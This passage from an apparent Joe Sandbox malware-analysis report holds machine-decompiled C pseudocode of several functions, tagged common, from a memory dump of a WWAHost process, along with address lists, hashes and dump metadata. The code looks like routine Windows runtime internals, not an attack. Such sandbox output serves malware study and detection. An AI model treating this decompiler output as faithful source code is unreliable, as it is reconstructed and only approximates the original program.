							_t27 = _t47 - 1; // -1
							_t88 = _t27;
							goto L25;
						}
						_t62 = _t85;
						if(L03A1C323(_t62, _v8, _t57) != 0xffffffff) {
							goto L22;
						}
						_push(_t62);
						_push(_t88);
						E03A1A80D(_t85, 9, _v8, _t88);
						goto L34;
					} else {
						_t101 = _t36;
						if(_t36 != 0) {
							L16:
							if(_t36 == 0xffffffff) {
								goto L19;
							}
							_t62 =  *((intOrPtr*)(_t36 + 2));
							if((_t62 & 0x0000000f) == 0) {
								goto L19;
							}
							_t62 = _t62 & 0xf;
							if(E039FCB1E(_t62, _t85, _v8, 3, _t36 + 8) < 0) {
								L34:
								return _t88;
							}
							goto L19;
						}
						_t62 = _t85;
						_t36 = E03A1ACFD(_t62, _t73, _t101, _t57, _t62);
						if(_t36 == 0) {
							goto L19;
						}
						goto L16;
					}
				}
			}



















                                              0x03a1ae44
                                              0x03a1ae4c
                                              0x03a1ae53
                                              0x03a1ae55
                                              0x03a1ae5c
                                              0x03a1ae64
                                              0x03a1ae68
                                              0x03a1ae75
                                              0x03a1ae75
                                              0x03a1ae78
                                              0x03a1ae7a
                                              0x03a1ae7c
                                              0x03a1ae7f
                                              0x03a1aea8
                                              0x03a1aeab
                                              0x03a1aead
                                              0x00000000
                                              0x00000000
                                              0x03a1aeb3
                                              0x03a1aeb8
                                              0x03a1aebb
                                              0x03a1aebd
                                              0x00000000
                                              0x03a1ae81
                                              0x03a1ae88
                                              0x03a1ae8f
                                              0x03a1ae9b
                                              0x03a1ae96
                                              0x03a1ae96
                                              0x03a1ae96
                                              0x03a1aea0
                                              0x03a1aea3
                                              0x03a1aebf
                                              0x03a1aebf
                                              0x03a1aec3
                                              0x03a1aec9
                                              0x03a1af0d
                                              0x03a1af14
                                              0x03a1af3d
                                              0x03a1af3d
                                              0x03a1af41
                                              0x03a1af44
                                              0x03a1af67
                                              0x03a1af67
                                              0x03a1af6a
                                              0x03a1afca
                                              0x03a1afd1
                                              0x00000000
                                              0x03a1afd1
                                              0x03a1af6c
                                              0x03a1af6d
                                              0x03a1af75
                                              0x03a1af7c
                                              0x03a1af7e
                                              0x03a1af80
                                              0x03a1af85
                                              0x03a1af87
                                              0x03a1af99
                                              0x03a1af89
                                              0x03a1af92
                                              0x03a1af92
                                              0x03a1af9e
                                              0x03a1afa1
                                              0x03a1afa3
                                              0x03a1afa9
                                              0x03a1afb0
                                              0x03a1afb2
                                              0x03a1afb4
                                              0x03a1afbc
                                              0x03a1afbc
                                              0x03a1afb4
                                              0x03a1afb0
                                              0x00000000
                                              0x03a1afa1
                                              0x03a1af4f
                                              0x03a1af57
                                              0x03a1af5c
                                              0x03a1af5e
                                              0x00000000
                                              0x00000000
                                              0x03a1af60
                                              0x03a1af64
                                              0x03a1af64
                                              0x00000000
                                              0x03a1af64
                                              0x03a1af1a
                                              0x03a1af25
                                              0x00000000
                                              0x00000000
                                              0x03a1af27
                                              0x03a1af28
                                              0x03a1af33
                                              0x00000000
                                              0x03a1aed0
                                              0x03a1aed0
                                              0x03a1aed2
                                              0x03a1aee1
                                              0x03a1aee4
                                              0x00000000
                                              0x00000000
                                              0x03a1aee6
                                              0x03a1aeec
                                              0x00000000
                                              0x00000000
                                              0x03a1aefb
                                              0x03a1af07
                                              0x03a1afd3
                                              0x03a1afdb
                                              0x03a1afdb
                                              0x00000000
                                              0x03a1af07
                                              0x03a1aed6
                                              0x03a1aed8
                                              0x03a1aedf
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x03a1aedf
                                              0x03a1aec9

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3a33c23bae084cde2b5db8d0c8ae34bc8845bcf875825c327963d38046af834c
                                              • Instruction ID: 0bafb9afd0e1ae08a22b47e248d7cd91b7fa8872afa327d3fef0fa1fbea03508
                                              • Opcode Fuzzy Hash: 3a33c23bae084cde2b5db8d0c8ae34bc8845bcf875825c327963d38046af834c
                                              • Instruction Fuzzy Hash: E041C3B57023119BC726DB29C994B3BF79AEF84620F08821EF8568B3D0DB34D821C791
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0397DBE9 Relevance: .1, Instructions: 149COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 86%
                                              			E0397DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0395CC50(E03954510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E03977D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = E03A28ED6(_t102, _t98);
						}
						_t76 = _v44;
						E03972280(_t58, _v44);
						E0397DD82(_v44, _t102, _t98);
						E0397B944(_t102, _v5);
						return E0396FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x3a48628; // 0x0
							_v28 = _t67;
							_t68 =  *0x3a4862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x3a48628; // 0x0
						_t105 = _v28;
						_t80 =  *0x3a4862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x3a1fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                              0x0397dbe9
                                              0x0397dbf2
                                              0x0397dbf7
                                              0x0397dbf9
                                              0x0397dbfc
                                              0x0397dc00
                                              0x0397dc03
                                              0x0397dc14
                                              0x0397dd54
                                              0x0397dd54
                                              0x0397dd54
                                              0x0397dc18
                                              0x0397dc1d
                                              0x0397dc1d
                                              0x0397dc32
                                              0x0397dc3b
                                              0x0397dc3e
                                              0x0397dc46
                                              0x0397dd5b
                                              0x0397dd62
                                              0x0397dd64
                                              0x0397dd67
                                              0x0397dd69
                                              0x0397dd6b
                                              0x0397dd6e
                                              0x0397dd70
                                              0x0397dd73
                                              0x0397dd73
                                              0x00000000
                                              0x0397dc4c
                                              0x0397dc4e
                                              0x039c3ae3
                                              0x039c3ae8
                                              0x039c3aea
                                              0x0397dce7
                                              0x0397dce9
                                              0x0397dcec
                                              0x0397dcee
                                              0x0397dcf0
                                              0x0397dcf3
                                              0x0397dcf5
                                              0x039c3af2
                                              0x039c3af5
                                              0x039c3af5
                                              0x0397dd06
                                              0x0397dd08
                                              0x0397dd0b
                                              0x0397dd12
                                              0x039c3b08
                                              0x0397dd18
                                              0x0397dd18
                                              0x0397dd18
                                              0x0397dd20
                                              0x0397dd23
                                              0x039c3b16
                                              0x039c3b16
                                              0x0397dd29
                                              0x0397dd2d
                                              0x0397dd36
                                              0x0397dd40
                                              0x0397dd51
                                              0x0397dd51
                                              0x0397dc54
                                              0x0397dc59
                                              0x0397dc59
                                              0x0397dc5e
                                              0x0397dc5e
                                              0x0397dc63
                                              0x0397dc66
                                              0x0397dc6b
                                              0x0397dc78
                                              0x0397dc7b
                                              0x0397dc81
                                              0x0397dc81
                                              0x0397dc83
                                              0x0397dc89
                                              0x00000000
                                              0x00000000
                                              0x0397dd7b
                                              0x0397dd7b
                                              0x0397dc8f
                                              0x0397dc8f
                                              0x0397dc92
                                              0x0397dc99
                                              0x0397dc9f
                                              0x0397dca5
                                              0x0397dcaa
                                              0x0397dcaa
                                              0x0397dcb3
                                              0x0397dcb8
                                              0x0397dcbb
                                              0x0397dcc1
                                              0x0397dccf
                                              0x0397dcd2
                                              0x0397dcd5
                                              0x0397dcd7
                                              0x0397dcda
                                              0x0397dcdc
                                              0x0397dcdc
                                              0x0397dce2
                                              0x0397dce4
                                              0x00000000
                                              0x0397dce4

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 7eb277eeaa97b381d4c22df053b72b2f2184a61260795fedba9b28c0b71262ee
                                              • Instruction ID: a0da6344946b65f9611227ad200e9b55e70a289cc46bd9d02196d7ef22c867a9
                                              • Opcode Fuzzy Hash: 7eb277eeaa97b381d4c22df053b72b2f2184a61260795fedba9b28c0b71262ee
                                              • Instruction Fuzzy Hash: AD51C375A00645CFCB14DFA8C480AAEFBF9FF88350F28859AD555AB384DB35AD44CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 0396EF40 Relevance: .1, Instructions: 147COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 96%
                                              			E0396EF40(intOrPtr __ecx) {
				char _v5;
				char _v6;
				char _v7;
				char _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t58;
				char _t59;
				signed char _t69;
				void* _t73;
				signed int _t74;
				char _t79;
				signed char _t81;
				signed int _t85;
				signed int _t87;
				intOrPtr _t90;
				signed char* _t91;
				void* _t92;
				signed int _t94;
				void* _t96;

				_t90 = __ecx;
				_v16 = __ecx;
				if(( *(__ecx + 0x14) & 0x04000000) != 0) {
					_t58 =  *((intOrPtr*)(__ecx));
					if(_t58 != 0xffffffff &&  *((intOrPtr*)(_t58 + 8)) == 0) {
						E03959080(_t73, __ecx, __ecx, _t92);
					}
				}
				_t74 = 0;
				_t96 =  *0x7ffe036a - 1;
				_v12 = 0;
				_v7 = 0;
				if(_t96 > 0) {
					_t74 =  *(_t90 + 0x14) & 0x00ffffff;
					_v12 = _t74;
					_v7 = _t96 != 0;
				}
				_t79 = 0;
				_v8 = 0;
				_v5 = 0;
				while(1) {
					L4:
					_t59 = 1;
					L5:
					while(1) {
						if(_t59 == 0) {
							L12:
							_t21 = _t90 + 4; // 0x7746c21e
							_t87 =  *_t21;
							_v6 = 0;
							if(_t79 != 0) {
								if((_t87 & 0x00000002) != 0) {
									goto L19;
								}
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000003;
								} else {
									_t51 = _t87 - 2; // -2
									_t74 = _t51;
								}
								goto L15;
							} else {
								if((_t87 & 0x00000001) != 0) {
									_v6 = 1;
									_t74 = _t87 ^ 0x00000001;
								} else {
									_t26 = _t87 - 4; // -4
									_t74 = _t26;
									if((_t74 & 0x00000002) == 0) {
										_t74 = _t74 - 2;
									}
								}
								L15:
								if(_t74 == _t87) {
									L19:
									E03952D8A(_t74, _t90, _t87, _t90);
									_t74 = _v12;
									_v8 = 1;
									if(_v7 != 0 && _t74 > 0x64) {
										_t74 = _t74 - 1;
										_v12 = _t74;
									}
									_t79 = _v5;
									goto L4;
								}
								asm("lock cmpxchg [esi], ecx");
								if(_t87 != _t87) {
									_t74 = _v12;
									_t59 = 0;
									_t79 = _v5;
									continue;
								}
								if(_v6 != 0) {
									_t74 = _v12;
									L25:
									if(_v7 != 0) {
										if(_t74 < 0x7d0) {
											if(_v8 == 0) {
												_t74 = _t74 + 1;
											}
										}
										_t38 = _t90 + 0x14; // 0x0
										_t39 = _t90 + 0x14; // 0x0
										_t85 = ( *_t38 ^ _t74) & 0x00ffffff ^  *_t39;
										if( *((intOrPtr*)( *[fs:0x30] + 0x64)) == 1) {
											_t85 = _t85 & 0xff000000;
										}
										 *(_t90 + 0x14) = _t85;
									}
									 *((intOrPtr*)(_t90 + 0xc)) =  *((intOrPtr*)( *[fs:0x18] + 0x24));
									 *((intOrPtr*)(_t90 + 8)) = 1;
									return 0;
								}
								_v5 = 1;
								_t87 = _t74;
								goto L19;
							}
						}
						_t94 = _t74;
						_v20 = 1 + (0 | _t79 != 0x00000000) * 2;
						if(_t74 == 0) {
							goto L12;
						} else {
							_t91 = _t90 + 4;
							goto L8;
							L9:
							while((_t81 & 0x00000001) != 0) {
								_t69 = _t81;
								asm("lock cmpxchg [edi], edx");
								if(_t69 != _t81) {
									_t81 = _t69;
									continue;
								}
								_t90 = _v16;
								goto L25;
							}
							asm("pause");
							_t94 = _t94 - 1;
							if(_t94 != 0) {
								L8:
								_t81 =  *_t91;
								goto L9;
							} else {
								_t90 = _v16;
								_t79 = _v5;
								goto L12;
							}
						}
					}
				}
			}




























                                              0x0396ef4b
                                              0x0396ef4d
                                              0x0396ef57
                                              0x0396f0bd
                                              0x0396f0c2
                                              0x0396f0d2
                                              0x0396f0d2
                                              0x0396f0c2
                                              0x0396ef5d
                                              0x0396ef5f
                                              0x0396ef67
                                              0x0396ef6a
                                              0x0396ef6d
                                              0x0396ef74
                                              0x0396ef7f
                                              0x0396ef82
                                              0x0396ef82
                                              0x0396ef86
                                              0x0396ef88
                                              0x0396ef8c
                                              0x0396ef8f
                                              0x0396ef8f
                                              0x0396ef8f
                                              0x00000000
                                              0x0396ef91
                                              0x0396ef93
                                              0x0396efc4
                                              0x0396efc4
                                              0x0396efc4
                                              0x0396efca
                                              0x0396efd0
                                              0x0396f0a6
                                              0x00000000
                                              0x00000000
                                              0x0396f0af
                                              0x039bbb06
                                              0x039bbb0a
                                              0x0396f0b5
                                              0x0396f0b5
                                              0x0396f0b5
                                              0x0396f0b5
                                              0x00000000
                                              0x0396efd6
                                              0x0396efd9
                                              0x0396f0de
                                              0x0396f0e2
                                              0x0396efdf
                                              0x0396efdf
                                              0x0396efdf
                                              0x0396efe5
                                              0x039bbafc
                                              0x039bbafc
                                              0x0396efe5
                                              0x0396efeb
                                              0x0396efed
                                              0x0396f00f
                                              0x0396f011
                                              0x0396f01a
                                              0x0396f01d
                                              0x0396f021
                                              0x0396f028
                                              0x0396f029
                                              0x0396f029
                                              0x0396f02c
                                              0x00000000
                                              0x0396f02c
                                              0x0396eff3
                                              0x0396eff9
                                              0x0396f0ea
                                              0x0396f0ed
                                              0x0396f0ef
                                              0x00000000
                                              0x0396f0ef
                                              0x0396f003
                                              0x039bbb12
                                              0x0396f045
                                              0x0396f049
                                              0x0396f051
                                              0x0396f09e
                                              0x0396f0a0
                                              0x0396f0a0
                                              0x0396f09e
                                              0x0396f053
                                              0x0396f064
                                              0x0396f064
                                              0x0396f06b
                                              0x039bbb1a
                                              0x039bbb1a
                                              0x0396f071
                                              0x0396f071
                                              0x0396f07d
                                              0x0396f082
                                              0x0396f08f
                                              0x0396f08f
                                              0x0396f009
                                              0x0396f00d
                                              0x00000000
                                              0x0396f00d
                                              0x0396efd0
                                              0x0396ef97
                                              0x0396efa5
                                              0x0396efaa
                                              0x00000000
                                              0x0396efac
                                              0x0396efac
                                              0x0396efac
                                              0x00000000
                                              0x0396efb2
                                              0x0396f036
                                              0x0396f03a
                                              0x0396f040
                                              0x0396f090
                                              0x00000000
                                              0x0396f092
                                              0x0396f042
                                              0x00000000
                                              0x0396f042
                                              0x0396efb7
                                              0x0396efb9
                                              0x0396efbc
                                              0x0396efb0
                                              0x0396efb0
                                              0x00000000
                                              0x0396efbe
                                              0x0396efbe
                                              0x0396efc1
                                              0x00000000
                                              0x0396efc1
                                              0x0396efbc
                                              0x0396efaa
                                              0x0396ef91

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction ID: 099dcfe8e1ad661f5c794fa35b29355de84bf38b4e5a77dba24baa540c76e4ca
                                              • Opcode Fuzzy Hash: fbecc144452e6e9740e37df579310400ca1de53fcc592e2907188de4c37816b0
                                              • Instruction Fuzzy Hash: F4512435E06749EFDB20CB68D2C07EEFBB9AF05384F1C81A8D44697281C376A989C741
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03A2740D Relevance: .1, Instructions: 141COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 84%
                                              			E03A2740D(intOrPtr __ecx, signed short* __edx, intOrPtr _a4) {
				signed short* _v8;
				intOrPtr _v12;
				intOrPtr _t55;
				void* _t56;
				intOrPtr* _t66;
				intOrPtr* _t69;
				void* _t74;
				intOrPtr* _t78;
				intOrPtr* _t81;
				intOrPtr* _t82;
				intOrPtr _t83;
				signed short* _t84;
				intOrPtr _t85;
				signed int _t87;
				intOrPtr* _t90;
				intOrPtr* _t93;
				intOrPtr* _t94;
				void* _t98;

				_t84 = __edx;
				_t80 = __ecx;
				_push(__ecx);
				_push(__ecx);
				_t55 = __ecx;
				_v8 = __edx;
				_t87 =  *__edx & 0x0000ffff;
				_v12 = __ecx;
				_t3 = _t55 + 0x154; // 0x154
				_t93 = _t3;
				_t78 =  *_t93;
				_t4 = _t87 + 2; // 0x2
				_t56 = _t4;
				while(_t78 != _t93) {
					if( *((intOrPtr*)(_t78 + 0x14)) != _t56) {
						L4:
						_t78 =  *_t78;
						continue;
					} else {
						_t7 = _t78 + 0x18; // 0x18
						if(E039AD4F0(_t7, _t84[2], _t87) == _t87) {
							_t40 = _t78 + 0xc; // 0xc
							_t94 = _t40;
							_t90 =  *_t94;
							while(_t90 != _t94) {
								_t41 = _t90 + 8; // 0x8
								_t74 = E0399F380(_a4, _t41, 0x10);
								_t98 = _t98 + 0xc;
								if(_t74 != 0) {
									_t90 =  *_t90;
									continue;
								}
								goto L12;
							}
							_t82 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
							if(_t82 != 0) {
								_t46 = _t78 + 0xc; // 0xc
								_t69 = _t46;
								asm("movsd");
								asm("movsd");
								asm("movsd");
								asm("movsd");
								_t85 =  *_t69;
								if( *((intOrPtr*)(_t85 + 4)) != _t69) {
									L20:
									_t82 = 3;
									asm("int 0x29");
								}
								 *((intOrPtr*)(_t82 + 4)) = _t69;
								 *_t82 = _t85;
								 *((intOrPtr*)(_t85 + 4)) = _t82;
								 *_t69 = _t82;
								 *(_t78 + 8) =  *(_t78 + 8) + 1;
								 *(_v12 + 0xdc) =  *(_v12 + 0xdc) | 0x00000010;
								goto L11;
							} else {
								L18:
								_push(0xe);
								_pop(0);
							}
						} else {
							_t84 = _v8;
							_t9 = _t87 + 2; // 0x2
							_t56 = _t9;
							goto L4;
						}
					}
					L12:
					return 0;
				}
				_t10 = _t87 + 0x1a; // 0x1a
				_t78 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t10);
				if(_t78 == 0) {
					goto L18;
				} else {
					_t12 = _t87 + 2; // 0x2
					 *((intOrPtr*)(_t78 + 0x14)) = _t12;
					_t16 = _t78 + 0x18; // 0x18
					E0399F3E0(_t16, _v8[2], _t87);
					 *((short*)(_t78 + _t87 + 0x18)) = 0;
					_t19 = _t78 + 0xc; // 0xc
					_t66 = _t19;
					 *((intOrPtr*)(_t66 + 4)) = _t66;
					 *_t66 = _t66;
					 *(_t78 + 8) =  *(_t78 + 8) & 0x00000000;
					_t81 = L03974620(_t80,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x18);
					if(_t81 == 0) {
						goto L18;
					} else {
						_t26 = _t78 + 0xc; // 0xc
						_t69 = _t26;
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t85 =  *_t69;
						if( *((intOrPtr*)(_t85 + 4)) != _t69) {
							goto L20;
						} else {
							 *((intOrPtr*)(_t81 + 4)) = _t69;
							 *_t81 = _t85;
							 *((intOrPtr*)(_t85 + 4)) = _t81;
							 *_t69 = _t81;
							_t83 = _v12;
							 *(_t78 + 8) = 1;
							 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							_t34 = _t83 + 0x154; // 0x1ba
							_t69 = _t34;
							_t85 =  *_t69;
							if( *((intOrPtr*)(_t85 + 4)) != _t69) {
								goto L20;
							} else {
								 *_t78 = _t85;
								 *((intOrPtr*)(_t78 + 4)) = _t69;
								 *((intOrPtr*)(_t85 + 4)) = _t78;
								 *_t69 = _t78;
								 *(_t83 + 0xdc) =  *(_t83 + 0xdc) | 0x00000010;
							}
						}
						goto L11;
					}
				}
				goto L12;
			}





















                                              0x03a2740d
                                              0x03a2740d
                                              0x03a27412
                                              0x03a27413
                                              0x03a27416
                                              0x03a27418
                                              0x03a2741c
                                              0x03a2741f
                                              0x03a27422
                                              0x03a27422
                                              0x03a27428
                                              0x03a2742a
                                              0x03a2742a
                                              0x03a27451
                                              0x03a27432
                                              0x03a2744f
                                              0x03a2744f
                                              0x00000000
                                              0x03a27434
                                              0x03a27438
                                              0x03a27443
                                              0x03a27517
                                              0x03a27517
                                              0x03a2751a
                                              0x03a27535
                                              0x03a27520
                                              0x03a27527
                                              0x03a2752c
                                              0x03a27531
                                              0x03a27533
                                              0x00000000
                                              0x03a27533
                                              0x00000000
                                              0x03a27531
                                              0x03a2754b
                                              0x03a2754f
                                              0x03a2755c
                                              0x03a2755c
                                              0x03a2755f
                                              0x03a27560
                                              0x03a27561
                                              0x03a27562
                                              0x03a27563
                                              0x03a27568
                                              0x03a2756a
                                              0x03a2756c
                                              0x03a2756d
                                              0x03a2756d
                                              0x03a2756f
                                              0x03a27572
                                              0x03a27574
                                              0x03a27577
                                              0x03a2757c
                                              0x03a2757f
                                              0x00000000
                                              0x03a27551
                                              0x03a27551
                                              0x03a27551
                                              0x03a27553
                                              0x03a27553
                                              0x03a27449
                                              0x03a27449
                                              0x03a2744c
                                              0x03a2744c
                                              0x00000000
                                              0x03a2744c
                                              0x03a27443
                                              0x03a2750e
                                              0x03a27514
                                              0x03a27514
                                              0x03a27455
                                              0x03a27469
                                              0x03a2746d
                                              0x00000000
                                              0x03a27473
                                              0x03a27473
                                              0x03a27476
                                              0x03a27480
                                              0x03a27484
                                              0x03a2748e
                                              0x03a27493
                                              0x03a27493
                                              0x03a27496
                                              0x03a27499
                                              0x03a274a1
                                              0x03a274b1
                                              0x03a274b5
                                              0x00000000
                                              0x03a274bb
                                              0x03a274c1
                                              0x03a274c1
                                              0x03a274c4
                                              0x03a274c5
                                              0x03a274c6
                                              0x03a274c7
                                              0x03a274c8
                                              0x03a274cd
                                              0x00000000
                                              0x03a274d3
                                              0x03a274d3
                                              0x03a274d6
                                              0x03a274d8
                                              0x03a274db
                                              0x03a274dd
                                              0x03a274e0
                                              0x03a274e7
                                              0x03a274ee
                                              0x03a274ee
                                              0x03a274f4
                                              0x03a274f9
                                              0x00000000
                                              0x03a274fb
                                              0x03a274fb
                                              0x03a274fd
                                              0x03a27500
                                              0x03a27503
                                              0x03a27505
                                              0x03a27505
                                              0x03a274f9
                                              0x00000000
                                              0x03a274cd
                                              0x03a274b5
                                              0x00000000

                                              Memory Dump Source
                                              • Source File: 0000000E.00000002.537728974.0000000003930000.00000040.00000800.00020000.00000000.sdmp, Offset: 03930000, based on PE: true
                                              • Associated: 0000000E.00000002.539466725.0000000003A4B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              • Associated: 0000000E.00000002.539485968.0000000003A4F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_14_2_3930000_WWAHost.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction ID: 82926546769700d76de008aab698d13a25cf1310d67afa493610c1a50028648b
                                              • Opcode Fuzzy Hash: 01a4d08349e29d22493120a27b3d49beb444160764ac4f0ac8d9a4757e3060ec
                                              • Instruction Fuzzy Hash: 58516D71600606EFDB15CF18C480A56FBB9FF49304F19C1AAE9089F252E772EA46CB90
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 03982990 Relevance: .1, Instructions: 133COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 97%
                                              			E03982990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
				signed int* _t102;
				void* _t103;
				void* _t104;
				void* _t107;

				_push(0x20);
				_push(0x3a2ff00);
				E039AD08C(_t81, _t98, _t101);
				 *((intOrPtr*)(_t103 - 0x28)) =  *[fs:0x18];
				_t99 = 0;
				 *((intOrPtr*)( *((intOrPtr*)(_t103 + 0x1c)))) = 0;
				_t82 =  *((intOrPtr*)(_t103 + 0x10));
				if(_t82 == 0) {
					_t62 = 0xc0000100;
				} else {
					 *((intOrPtr*)(_t103 - 4)) = 0;
					_t102 = 0xc0000100;
					 *((intOrPtr*)(_t103 - 0x30)) = 0xc0000100;
					_t64 = 4;
					while(1) {
						 *(_t103 - 0x24) = _t64;
						if(_t64 == 0) {
							break;
						}
						_t87 = _t64 * 0xc;
						 *(_t103 - 0x2c) = _t87;
						_t107 = _t82 -  *((intOrPtr*)(_t87 + 0x3931664));
						if(_t107 <= 0) {
							if(_t107 == 0) {
								_t79 = E0399E5C0( *((intOrPtr*)(_t103 + 0xc)),  *((intOrPtr*)(_t87 + 0x3931668)), _t82);
								_t104 = _t104 + 0xc;
								__eflags = _t79;
								if(__eflags == 0) {
									_t102 = E039D51BE(_t82,  *((intOrPtr*)( *(_t103 - 0x2c) + 0x393166c)),  *((intOrPtr*)(_t103 + 0x14)), _t99, _t102, __eflags,  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
									 *((intOrPtr*)(_t103 - 0x30)) = _t102;
									break;
								} else {
									_t64 =  *(_t103 - 0x24);
									goto L5;
								}
								goto L13;
							} else {
								L5:
								_t64 = _t64 - 1;
								continue;
							}
						}
						break;
					}
					 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
					__eflags = _t102;
					if(_t102 < 0) {
